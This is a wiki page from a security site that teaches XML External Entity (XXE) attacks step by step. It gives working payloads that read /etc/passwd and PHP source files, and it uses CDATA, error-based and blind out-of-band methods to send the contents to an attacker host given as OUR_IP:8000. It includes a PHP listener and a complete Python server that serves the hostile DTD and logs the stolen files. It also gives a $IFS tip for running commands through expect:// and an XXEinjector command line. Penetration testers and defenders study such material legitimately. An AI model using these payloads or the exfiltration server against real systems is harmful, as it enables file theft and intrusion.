Bug Culture Wiki
Contents:
  1. XML External Entities (XXE)
    1. External XML Entities
    2. Local File Disclosure
    3. Advanced File Disclosure
      1. Advanced Exfiltration with CDATA
    4. Error Based XXE
    5. Blind Data Exfiltration
    6. Automated OOB Exfiltration

XML External Entities (XXE)

External XML Entities

XML External Entity (XXE) injection occurs when an application parses XML from an untrusted source with a parser that still processes the Document Type Definition (DTD) and resolves external entities. An attacker who controls the XML can then declare entities that the parser expands into local file contents, remote resources or, depending on the parser and platform, other side effects. The vulnerability is a parser configuration problem rather than a missing input filter.

Local File Disclosure

  1. Identify XML Inputs:
    The first step is to locate web pages that accept XML input from users.

  2. Look for Defined Entities:
    Check whether the request already carries a DOCTYPE with entity declarations, and whether the response echoes any part of the XML input back. If an entity's value is reflected in the output (instead of the literal entity reference), the parser processes the DTD and the application may be vulnerable to XXE.

  3. Testing with a Custom Entity:
    Create a new entity and call it in the XML payload:

    <!DOCTYPE email [
    <!ENTITY company "Inlane Freight">
    ]>
       
    <email>&company;</email>
    

    If the response outputs “Inlane Freight” instead of &company;, the parser processes the DTD and expands entities. That alone does not prove XXE: internal entities are expanded by almost every parser, hardened ones included. Replace the literal value with a SYSTEM entity (for example <!ENTITY company SYSTEM "file:///etc/passwd">) and check whether the file contents come back; only then is external entity resolution confirmed.

Note: when an XXE is chained into command execution (for example through PHP's expect:// stream wrapper, one route to the remote code execution listed below), the command sits inside the entity's SYSTEM identifier. Spaces in the command can be replaced with $IFS so that it survives there, and characters such as |, >, or { that would break the XML or the identifier should be avoided.
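The three checks above, carried out against a real parser. This is an added example, not code from the original page: it drives Python's own xml.sax parser (expat) with the custom-entity payload and with a SYSTEM entity pointing at a file, once with external entity resolution enabled and once disabled, and uses a constructed temporary file in place of /etc/passwd. The function and file names are this example's own.

```python
"""Added example: XXE checks against Python's xml.sax parser (expat).

Two things it shows with a real parser:
  1. an internal entity (&company;) expands whether or not external
     entities are enabled, so reflection alone only proves DTD processing;
  2. a SYSTEM entity pointing at file:// is only read when the parser
     resolves external general entities, which is the XXE itself.
The secret file and both payloads are constructed here for the demo.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects the character data of the document, including text that
    arrives through entity expansion."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_untrusted(xml_bytes, resolve_external):
    """Parse attacker-controlled XML and return its text content.

    resolve_external=True mirrors a parser that fetches SYSTEM entities
    (the vulnerable configuration); False is the safe setting and the
    xml.sax default since Python 3.7.1.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def entity_test_payload():
    """Step 3 of the page: a custom internal entity that should be reflected."""
    return (b'<!DOCTYPE email [\n'
            b'<!ENTITY company "Inlane Freight">\n'
            b']>\n'
            b'<email>&company;</email>')


def file_read_payload(path):
    """Local file disclosure: a SYSTEM entity pointing at a file on the
    server (absolute POSIX path assumed)."""
    return (f'<!DOCTYPE email [\n'
            f'<!ENTITY xxe SYSTEM "file://{path}">\n'
            f']>\n'
            f'<email>&xxe;</email>').encode()


def make_secret_file():
    """Constructed stand-in for /etc/passwd so the demo runs anywhere."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash")
    return path


def run_demo():
    """Run all four checks and return their results as a tuple:
    (reflected/safe, reflected/vulnerable, file/safe, file/vulnerable)."""
    secret = make_secret_file()
    try:
        return (
            parse_untrusted(entity_test_payload(), resolve_external=False),
            parse_untrusted(entity_test_payload(), resolve_external=True),
            parse_untrusted(file_read_payload(secret), resolve_external=False),
            parse_untrusted(file_read_payload(secret), resolve_external=True),
        )
    finally:
        os.remove(secret)


if __name__ == "__main__":
    for label, result in zip(
        ("internal entity, safe parser", "internal entity, vulnerable parser",
         "file entity, safe parser", "file entity, vulnerable parser"),
        run_demo(),
    ):
        print(f"{label}: {result!r}")
```

The first two results both read Inlane Freight, which is why reflection of a custom entity is only a hint; the file contents appear in the fourth result only, while the safe parser silently drops the external entity. Parsers differ in their defaults (Python's xml.sax has refused external general entities since 3.7.1, while older libxml2-based stacks and Java's DocumentBuilder resolved them unless configured otherwise), so the second check is the one that decides.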

Potential Exploits:

  • Reading sensitive files (e.g. /etc/passwd, configuration files holding credentials)
  • Reading source code (needs the CDATA or php://filter tricks below, because raw source usually breaks the XML)
  • Achieving remote code execution with XXE (parser and platform dependent, e.g. PHP with the expect wrapper)
  • Triggering SSRF (Server-Side Request Forgery) against internal services
  • Denial of Service (DoS) attacks (e.g. recursive entity expansion)

Advanced File Disclosure

Advanced Exfiltration with CDATA

A file that contains characters such as < or & (PHP source, for instance) cannot be pulled in as a plain entity: the parser tries to parse the contents as XML and fails. Wrapping the file in a CDATA section avoids this. The wrapper has to be assembled from parameter entities, and XML forbids parameter-entity references inside markup declarations in the internal subset, so the declaration that joins the pieces must live in an external DTD that we host. For example:

  1. Create a DTD File (xxe.dtd):
    echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
    python3 -m http.server 8000
    
  2. Craft the XML Payload:
    <!DOCTYPE email [
    <!ENTITY % begin "<![CDATA["> <!-- Prepend the beginning of the CDATA tag -->
    <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- Reference external file -->
    <!ENTITY % end "]]>"> <!-- Append the end of the CDATA tag -->
    <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- Reference our external DTD -->
    %xxe;
    ]>
    <email>&joined;</email> <!-- Reference the general entity declared by the external DTD -->
    

    When the external DTD is fetched and processed, it declares the general entity joined whose value is the CDATA opener, the raw contents of submitDetails.php and the CDATA closer. Referencing &joined; in the document body therefore returns the PHP source verbatim where a plain entity would have produced a parse error.

Error Based XXE

Error-based XXE uses the application's error messages to leak file contents, so it only works when parser errors are returned to the client. The idea is to make the parser fail while resolving an entity whose SYSTEM identifier embeds the file, so that the error message echoes the file. To test this:

  1. Host a DTD with the Following Payload:
    <!ENTITY % file SYSTEM "file:///etc/hosts">
    <!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
    
  2. Craft the XML Payload:
    <!DOCTYPE email [
    <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
    %remote;
    %error;
    ]>
    

    %remote; loads the hosted DTD, which declares %file; (the contents of /etc/hosts) and %error;. Expanding %error; declares an entity whose SYSTEM identifier starts with the undefined %nonExistingEntity; and continues with the expanded file contents. The parser cannot resolve that identifier and, if errors are displayed, the message quotes it, and with it the file. No entity needs to be referenced in the document body.

Note: This method is limited by how much of the identifier the error message shows and breaks when the file contains characters that are invalid in an entity value or a URI, which makes it less reliable than the CDATA method.

Blind Data Exfiltration

When direct output isn’t available (i.e., the XML entities or errors are not returned), an out-of-band (OOB) method can be used:

  1. Base64 Encode the File Content Using PHP Filter:
    Utilize a parameter entity to read and encode the file. Base64 matters here because the contents end up inside a URL: newlines, slashes and other characters in a raw file would break both the entity value and the request, while the encoded form survives both. php://filter only exists when the target runs PHP; with another parser you need a file free of such characters or a different encoding trick.

    <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
    
  2. PHP Listener to Capture the Exfiltrated Data:
    Create a simple PHP script (index.php):

    <?php
    if(isset($_GET['content'])){
        error_log("\n\n" . base64_decode($_GET['content']));
    }
    ?>
    

    Run PHP's built-in server from the directory that holds both index.php and xxe.dtd, so that one listener serves the DTD and receives the callback:

    php -S 0.0.0.0:8000
    
  3. Craft the Final XML Payload:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE email [ 
      <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
      %remote;
      %oob;
    ]>
    <root>&content;</root>
    

    When processed, %remote; loads the DTD, %oob; declares the content entity, and the reference &content; makes the target's parser request http://OUR_IP:8000/?content=<base64 of /etc/passwd>, which the PHP script decodes and writes to its error log. The data travels in a plain GET, so anything with HTTP egress to your host will do; DNS-based variants exist for more restricted networks but are outside this page.
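A Python equivalent of the PHP listener above, added here as an example rather than taken from the page: one process serves xxe.dtd and receives the callback, and the decoder handles two things the one-line PHP listener does not, a '+' in the base64 that a query-string parser has already turned into a space, and '=' padding stripped at the end of the value. OUR_IP, port 8000 and /etc/passwd are the page's placeholders; the file and function names are this example's own.

```python
"""Added example: out-of-band XXE listener (Python stand-in for index.php).

Serves the external DTD from the Blind Data Exfiltration step and
receives the callback carrying the base64-encoded file. The parser on
the target sends the base64 raw inside the URL, so the decoder works on
the raw query string instead of a plus-to-space parsed dictionary.
"""
import base64
import binascii
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

CALLBACK_BASE = "http://OUR_IP:8000"   # assumed attacker host (page placeholder)
TARGET_FILE = "/etc/passwd"            # assumed file on the target
LOG_FILE = "exfil.log"                 # where decoded data is appended


def build_dtd(target_file=TARGET_FILE, callback_base=CALLBACK_BASE):
    """Build the external DTD: %file reads and base64-encodes the file
    through php://filter, %oob declares a general entity whose SYSTEM URL
    points back at us with the data in the query string."""
    return (
        f'<!ENTITY % file SYSTEM '
        f'"php://filter/convert.base64-encode/resource={target_file}">\n'
        f'<!ENTITY % oob "<!ENTITY content SYSTEM '
        f"'{callback_base}/?content=%file;'>\">\n"
    )


def decode_exfil(raw_query):
    """Recover the file bytes from the 'content' parameter of a callback
    query string. Returns None when the parameter is missing or is not
    valid base64."""
    value = None
    for pair in raw_query.split("&"):
        name, _, val = pair.partition("=")   # split on the first '=' only
        if name == "content":
            value = val
            break
    if value is None:
        return None
    # Undo percent-encoding if anything upstream applied it, but never
    # turn '+' into a space: '+' is part of the base64 alphabet.
    value = urllib.parse.unquote(value)
    # If a plus-to-space conversion already happened, put the '+' back.
    value = value.replace(" ", "+")
    # Restore padding the URL may have lost.
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None


class ExfilHandler(BaseHTTPRequestHandler):
    """Serves /xxe.dtd and logs decoded data from /?content=<base64>."""

    def do_GET(self):
        parsed = urllib.parse.urlsplit(self.path)
        if parsed.path == "/xxe.dtd":
            body = build_dtd().encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        data = decode_exfil(parsed.query)
        if data is not None:
            with open(LOG_FILE, "ab") as f:
                f.write(b"\n\n" + data)
            print(data.decode(errors="replace"))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


def run_listener(host="0.0.0.0", port=8000):
    """Start the combined DTD server and callback receiver."""
    HTTPServer((host, port), ExfilHandler).serve_forever()


if __name__ == "__main__":
    run_listener()
```

Run it in place of python3 -m http.server and php -S, point the %remote entity at /xxe.dtd, and the decoded file is printed and appended to exfil.log. The space-to-plus repair is the detail worth remembering: PHP's $_GET applies the same plus-to-space rule, and a non-strict base64_decode then silently drops the character and shifts every byte after it, so a corrupted dump from the PHP listener usually means the file's base64 contained a '+'.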

Automated OOB Exfiltration

Automated tools can simplify blind XXE data exfiltration. One such tool is XXEinjector:

  1. Clone the Repository:
    git clone https://github.com/enjoiz/XXEinjector.git
    
  2. Prepare the HTTP Request File:
    Copy the raw HTTP request from Burp, save it (here as /tmp/xxe.req) and replace the XML body after the XML declaration with the marker XXEINJECT, which tells the tool where to place its DOCTYPE:
    POST /example 
    Headers: blah 
       
    <?xml version="1.0" encoding="UTF-8"?>
    XXEINJECT
    
  3. Run XXEinjector:
    Use the following command, where --host is the address the target must call back (your tun0 IP), --httpport the port the tool listens on, --file the saved request, --path the file to read, --oob=http the exfiltration channel and --phpfilter the php://filter base64 wrapper (PHP targets only); adjust the flags as necessary:
    ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
    

    The data travels base64 encoded and XXEinjector writes it, decoded, under its Logs folder, one file per target host and path. You can review it with:

    cat Logs/10.129.201.94/etc/passwd.log
    

    The presence of the passwd entries in that log shows that /etc/passwd was successfully exfiltrated from the target system.


This wiki page covers various XXE attack techniques, from basic local file disclosure and CDATA-based exfiltration to error-based and blind data exfiltration, along with a tool for automating out-of-band attacks. The reliable fix is parser configuration rather than filtering: disable DTD processing, or at least external entity and external DTD resolution, in every XML parser the application uses, keep those parsers up to date, and treat input validation as defense in depth only.